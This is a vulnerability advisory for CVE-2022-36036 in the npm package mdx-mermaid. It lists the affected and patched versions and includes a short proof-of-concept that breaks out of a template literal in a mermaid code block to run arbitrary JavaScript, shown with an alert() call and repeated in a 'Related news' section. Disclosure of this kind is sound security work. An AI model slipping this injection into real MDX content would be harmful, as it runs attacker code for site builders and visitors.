Headline
CVE-2022-36036: Improper Control of Generation of Code ('Code Injection') in mdx-mermaid
mdx-mermaid provides plug and play access to Mermaid in MDX. There is a potential for an arbitrary javascript injection in versions less than 1.3.0 and 2.0.0-rc1. Modify any mermaid code blocks with arbitrary code and it will execute when the component is loaded by MDXjs. This vulnerability was patched in version(s) 1.3.0 and 2.0.0-rc2. There are currently no known workarounds.
Package
npm mdx-mermaid (npm)
Affected versions
0.0.1, 1.0.0, 1.1.0, 1.1.1, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 2.0.0-rc1
Patched versions
1.3.0, 2.0.0-rc2
Impact
Arbitary javascript injection
Modify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs
` + (function () {
// Put Javascript code here
return ''
}()) + `
The block below shows a valid mermaid code block
```mermaid graph TD; A–>B; A–>C; B–>D; C–>D; ```
The same block but with the exploit added
```mermaid ` + (function () { alert(‘vulnerable’) return ‘’ }()) + ` graph TD; A–>B; A–>C; B–>D; C–>D; ```
Patches
1.3.0 and 2.0.0-rc2
Workarounds
None known
References
None
For more information
N/A
Related news
### Impact Arbitary javascript injection Modify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs ``` ` + (function () { // Put Javascript code here return '' }()) + ` ``` The block below shows a valid mermaid code block ````md ```mermaid graph TD; A-->B; A-->C; B-->D; C-->D; ``` ```` The same block but with the exploit added ````md ```mermaid ` + (function () { alert('vulnerable') return '' }()) + ` graph TD; A-->B; A-->C; B-->D; C-->D; ``` ```` ### Patches 1.3.0 and 2.0.0-rc2 ### Workarounds None known